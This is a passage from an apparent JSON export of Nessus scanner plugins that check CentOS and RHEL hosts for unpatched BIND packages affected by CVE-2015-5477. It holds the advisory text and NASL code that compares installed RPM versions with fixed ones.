RHSA-2015:1513 and \n# CentOS Errata and Security Advisory 2015:1513 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85047);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1513\");\n\n script_name(english:\"CentOS 6 / 7 : bind (CESA-2015:1513)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-July/021268.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b8978d17\"\n );\n # http://lists.centos.org/pipermail/centos-cr-announce/2015-July/002105.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e20c6079\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n# Temp disable\nexit(0, 'Temporarily disabled.');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-devel-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-libs-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-libs-lite-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-license-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-lite-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:12", "description": "Updated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "RHEL 5 : bind (RHSA-2015:1514)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind", "p-cpe:/a:redhat:enterprise_linux:bind-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libbind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libs", "p-cpe:/a:redhat:enterprise_linux:bind-sdb", "p-cpe:/a:redhat:enterprise_linux:bind-utils", "p-cpe:/a:redhat:enterprise_linux:caching-nameserver", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2015-1514.NASL", "href": "https://www.tenable.com/plugins/nessus/85069", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1514. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85069);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1514\");\n\n script_name(english:\"RHEL 5 : bind (RHSA-2015:1514)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1514\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1514\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-debuginfo-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-libbind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-libs-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:15", "description": "Updated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : bind (RHSA-2015:1513)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind", "p-cpe:/a:redhat:enterprise_linux:bind-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libs", "p-cpe:/a:redhat:enterprise_linux:bind-libs-lite", "p-cpe:/a:redhat:enterprise_linux:bind-license", "p-cpe:/a:redhat:enterprise_linux:bind-lite-devel", "p-cpe:/a:redhat:enterprise_linux:bind-sdb", "p-cpe:/a:redhat:enterprise_linux:bind-sdb-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-utils", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.1", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-1513.NASL", "href": "https://www.tenable.com/plugins/nessus/85068", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1513. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85068);\n script_version(\"2.19\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1513\");\n\n script_name(english:\"RHEL 6 / 7 : bind (RHSA-2015:1513)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1513\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1513\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"bind-debuginfo-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"bind-devel-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", 